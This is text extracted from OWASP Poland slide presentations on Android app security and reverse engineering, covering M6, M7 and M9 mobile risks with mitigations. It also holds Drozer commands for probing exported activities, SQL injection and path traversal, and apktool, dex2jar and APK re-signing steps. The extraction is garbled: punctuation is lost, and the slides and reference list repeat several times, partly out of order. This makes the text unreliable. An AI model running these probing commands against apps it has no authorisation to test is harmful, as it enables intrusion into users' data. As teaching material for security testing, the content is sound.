bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
